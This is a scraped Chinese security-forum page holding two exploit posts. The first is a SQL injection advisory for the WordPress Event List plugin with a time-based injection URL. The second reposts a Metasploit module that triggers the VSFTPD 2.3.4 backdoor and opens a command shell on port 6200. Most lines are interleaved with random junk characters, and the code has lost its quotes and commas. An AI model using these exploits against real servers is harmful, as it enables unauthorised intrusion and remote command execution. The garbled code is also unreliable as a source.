  k4 T9 W- _; n& Q% ~- L, w2 ?' H1 Z
8 k" o$ [3 q3 n# o& B6 x1 a" n7 f, @2 H

$ u! x: b3 W, C" D
2 G, K, z1 s0 r
: ^9 n! N9 }, M( j  D公告：https://www.sitedirsec.com公布最新漏洞，请关注

loye13

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞

---

1. Description:" C* }( Y- e8 ?# v* E
  ; J% r1 f' T, \* X# e% g
     
" p# p  W# r" W2 E5 {( l0 ^  
( x1 P, \& M1 {5 X8 kSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress2 X% D. U. h7 u! I9 X; R6 a
allows an authenticated user to execute arbitrary SQL commands via the id! k* P0 `" V& D7 m# j2 M$ G* W
parameter to wp-admin/admin.php. 0 w; g* }, E  ]- t# X: y+ {
  ; U7 \  B5 X8 L1 s2 G7 Q
   
& j0 N- R, q4 l5 D/ s8 [6 |2 m0 t  
, \& E; Q+ r; t  A) `( s- I2. Proof of Concept:  O, M1 \" u% \9 d9 N
  3 D! Z2 O, w4 P6 v7 z% [7 a0 E
   " E5 k1 b) h+ q6 ~$ C& n/ k# U
  7 s) A* b+ p, H8 `
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
9 T9 {  `( D' E! f% ~0 o+ f0 b# e+ Q=1 AND SLEEP(10)9 T" Q( b" {" C/ F* y9 y

  L7 B0 y. Y: f1 G; D  
, P0 c* `9 W: y$ }' h   
8 K& T; t; r' x  I2 P  / [2 K* G5 d4 s- ^
3. Solution:
# e; Y$ D, \1 U$ }- s  
9 U: T9 v$ q! l     
! @2 t# X$ o& Y* J  
( m1 ?: C+ B  N9 GThe plugin has been removed from WordPress. Deactivate the plug-in and wait
9 {' V8 t# c- r) J/ Y/ j6 ~for a hotfix., j1 N2 C6 t& y3 k- U5 C
  
# D- F+ }: s$ j  M; D   4 {8 U2 O5 B5 Z! O
  
/ ?# p* }/ u3 S' N3 y) P4. Reference:
4 @. G2 a% ]; B+ o    v& s( X: ]0 j% b! l1 @
   
% p3 F; ]% y9 f; w7 ~4 f# J0 T( I  
5 ?; y; H( T7 u, E+ ?9 J1 @, D9 ?. ?" ]http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
+ m- `2 A( |. y+ w; P. fction-sqli/% S+ |$ k7 S4 P8 O  _3 e
  * P* _. G/ e) U7 e* C# Q! z8 {
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
* O" C6 D; W% Y$ D/ L0 P* W; D! o  J
( O/ F& b; t+ Y" T3 ?% D( L
! Q; }' d: F4 u$ @- ?0 j

  c2 W5 n% Q0 z& e! l  _3 a4 m5 F6 J7 E7 d" ~9 G" p# `7 ]
5 z+ }, d7 T# @2 o* j& |" Y

" N/ @) l; H4 \7 a- l4 Z9 T  y) |9 @1 U

# Z% F0 B$ E3 J  S: Q2 K6 f& e# e# \, s1 D, \

" b0 ~4 }( Z. Y  X7 H0 n$ j8 v4 {" A. Z3 f: H$ t* v1 Y5 T( V
* l8 S3 H/ `6 N0 n4 X6 h  D! X

% L  l+ G! i4 n5 u( A% H+ J9 K1 V5 \% N( J; `  g8 e$ p
' D, B5 o; c; I. G- A- K$ U
+ C1 ~, @) c$ u% f* U
5 O8 I, Y; @" X! m, {8 N
公告：https://www.sitedirsec.com公布最新漏洞，请关注

hushui8878

VSFTPD v2.3.4 Backdoor 命令执行漏洞

---

################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
+ u1 b) d5 _9 \4 S& @& @5 B
! O1 p2 B  X# g$ j5 h, T* a/ f6 s0 p# _5 [+ ^- V0 ~  Z; r! R# B! [
; N! \. d. @  G! i
require msf/core
& l+ T, w5 C  A! d8 ^. V! S8 b) {- v0 k" [% O9 d
class Metasploit3 < Msf::Exploit::Remote# h, H; g' @5 S: x! D
Rank = ExcellentRanking
1 T5 S0 N/ \: t& X% C% \9 |: ]7 z. S
include Msf::Exploit::Remote::Tcp# W" q8 e. C. r, S% _

( l4 I2 `4 V7 `/ ?8 y$ Qdef initialize(info = {})2 V- ~8 t! M5 B* H
super(update_info(info
+ e; H0 Z' r% C  }Name => VSFTPD v2.3.4 Backdoor Command Execution
9 {9 O8 N+ D, A3 e1 cDescript_ion => %q{
1 \/ R8 T( p* e0 F2 {* vThis module exploits a malicious backdoor that was added to the VSFTPD download
7 M8 U& w% @# I6 U, W# larchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
3 W5 T5 x) o+ ?# ^# OJune 30th 2011 and July 1st 2011 according to the most recent information/ F2 _$ q; T3 q9 g0 Z% W
available. This backdoor was removed on July 3rd 2011.
! N- m% D  R" I6 u1 l: J: e- K}
" \; y5 h7 E# g: Y( h- cAuthor => [ hdm mc ]+ Z6 ~, U1 K7 \2 S$ y# A  v
License => MSF_LICENSE0 |" c- H* |2 C( P
Version => $Revision: 13099 $
( m* U$ M$ u# p! y% xReferences =>
7 E- J+ V' h3 j[1 B: y) r7 V% |
[ URL http://pastebin.com/AetT9sS5]9 B3 P& l6 f( {; q9 c
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]# _7 ^3 s7 C9 K! d+ H
]
! y! g3 G) Y5 C5 zPrivileged => true4 l+ w8 D! y9 x* s
Platform => [ unix ]
' R1 r* c. Q0 p2 x; UArch => ARCH_CMD
6 e7 p$ o& F$ `9 h3 M: v* A% w* hPayload =>- H- ^: P# {: l. b5 y  L
{; D5 F/ u7 N* Y1 c
Space => 2000
3 V8 j) T6 p* G( b  HBadChars => $ ]2 j" w! O# V
DisableNops => true* L, z4 J$ q  X" \, k2 B
Compat =>, d5 x  h6 d/ F! I
{
' [$ d! M+ f1 s5 U4 SPayloadType => cmd_interact
0 ]1 P. {+ a! k3 r5 Z5 h  w( iConnectionType => find1 m" W2 h. e8 J. u3 i' H# x
}' f1 o' y( C4 E8 g7 g  }. u
}* i5 V* z  v: z6 S3 O0 q* `+ A
Targets =>
; |, n3 J$ Z. i  N. y4 v/ }[
, A2 i7 S# _$ E- r" y. j[ Automatic { } ]
. U0 x! D6 V$ F0 J/ d]0 a6 F$ l6 x3 o  k4 E6 m
DisclosureDate => Jul 3 20111 F* v4 |; [* _2 ~
DefaultTarget => 0))& r: X7 d: M) T4 g0 R
" T) U% N( E  d7 R
register_options([ Opt::RPORT(21) ] self.class): i4 O! |& c6 n/ ~9 a
end
5 v6 n! j9 h4 t, `* L
9 l" {2 W2 |. f8 N( C- D/ [2 r' B5 Pdef exploit
0 q2 q4 R9 F6 x
1 N5 w; N% A+ dnsock = self.connect(false {RPORT => 6200}) rescue nil& M2 H7 D1 v/ S. `; k+ U
if nsock! c9 r0 ^9 [/ v8 N! \+ A
print_status(The port used by the backdoor bind listener is already open), g. _0 Z; d) E: [! L
handle_backdoor(nsock); A& ~- P" s4 l4 w4 O
return
5 D  f4 k4 Z: v. d3 r% j4 ^/ xend
4 i3 Q7 B2 k& U6 Q5 M* n
$ n+ O: X/ A6 Q( w' P, ~" d' ]# Connect to the FTP service port first
0 A: X0 k- @, t0 t) M' u+ I/ ]connect
1 s2 Y# F$ g6 u- W! |1 W
- u9 ]( P$ y0 Bbanner = sock.get_once(-1 30).to_s
( ?0 c& X  ~" Kprint_status(Banner: #{banner.strip})
: P9 d- N. q6 J! ]; F9 L7 J1 g1 L+ h' E4 G6 z3 f9 S# f( |
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
3 O( J9 o& }# R  N/ H)
$ j8 |4 }. R$ p1 L3 j5 T0 Jresp = sock.get_once(-1 30).to_s
5 M" h+ T* n- B- X/ d6 J' _* qprint_status(USER: #{resp.strip})" [7 O# j: X7 B7 {

6 B) G& O9 b( jif resp =~ /^530 // M7 X8 e; r1 p' h9 F; F
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
- T- J5 c! b1 w# }disconnect2 _( |/ S- _  o% D% }
return  z: T/ L3 y6 i& X
end0 U9 I& Q5 e- E( N7 B7 c

" C3 G4 ^6 o% d: D4 wif resp !~ /^331 /, Y. p4 [; p" V
print_error(This server did not respond as expected: #{resp.strip})
5 G8 d6 n6 B8 h7 }+ mdisconnect( n2 [" b! L0 F$ m
return$ B& r; f6 G% Y
end
- o) Y/ r0 v- x; L* f% r7 S% y1 K2 e3 x% l7 [7 U4 u  M& V
sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}! U6 p: s5 v) ^
)
! f7 P4 X& R, U! i* Q
* r" ^; R. J: y5 ^+ S+ I9 Y2 b# Do not bother reading the response from password just try the backdoor
- }- ~* [# P# t1 k- E6 Y8 S# ?8 qnsock = self.connect(false {RPORT => 6200}) rescue nil
& g  `8 E9 E5 c! |if nsock3 b* M4 _& Y) Z6 e4 I
print_good(Backdoor service has been spawned handling...)  v: y& K9 T. W& g6 T% A
handle_backdoor(nsock)7 |: m* c/ ^* C/ _5 t) S
return
! V2 O$ E. _- send
( C( j! v  A& s. }, V3 k2 P' W0 V& j# `7 Q
disconnect8 j7 ]0 {8 [$ r
; j+ n. s$ ^+ L/ o* g  S
end
7 F6 @% E/ P4 R6 ]7 W# @/ F$ N" h3 N  m6 b# r5 w
def handle_backdoor(s)
* {1 V7 _# @: A. Z$ o: x9 V* m: w7 D4 y
s.put(id
6 ^2 V: y+ \2 Z2 {5 S* ^. ]); J  S: W3 W2 }
, u( j7 q+ F, t9 D, x: I* l
r = s.get_once(-1 5).to_s9 ~8 `8 f; X; a. i, v) J. l! f
if r !~ /uid=/
. z  H4 @+ m4 @print_error(The service on port 6200 does not appear to be a shell)
# v. Q$ U7 n  \/ b5 Y0 F# R/ s) fdisconnect(s)% m. |- s% W# x2 T- I
return
1 U& C. w. V4 z: Qend
4 d2 f. y& J$ ?: b
* A  E( N- {1 O2 \! fprint_good(UID: #{r.strip})# E  H/ n  |' r# s. a( v+ f

' o$ S: I# p; H! ks.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
9 }8 ]1 R9 G5 M0 ohandler(s)# b8 k! _' Y% h
end
! ~- B& N: m9 O5 V) @
7 P8 T" l' {, d- Z( gend复制代码
- C% l. V- I4 T5 e* O% C) G- b+ K
4 B: \- v% H5 h8 U, I' V4 K# s' a6 o2 F  ~* }

6 Z8 e' ]2 }/ B2 j3 `# U  h( h, g8 e- C5 P, @
8 n' C( d( ?7 ]' M, R- U( O
! R) C1 E3 |4 g  g
8 _2 m8 l: Y4 _# Z
: K3 a  Z3 U- z
. z) t2 Z$ |' X4 R, }/ i! p, k9 s) D1 J$ R
1 j: l) g- K9 J3 }1 [0 ~5 ^6 T0 J

: X$ i. n" o: K: A
% ^$ h1 E- v$ N4 Z% @6 d, F5 R9 Z% S2 E

) v* s( A2 y% S( `7 R% ]
. k& a& f0 }4 j& R$ W% g* q; B7 B
8 L3 ^7 O' v" d7 q  _
* [) x# ?& L2 l  _  _4 _/ ?, @% K9 m- X6 {' F( p8 C7 B" w  {& L* J
公告：https://www.sitedirsec.com公布最新漏洞，请关注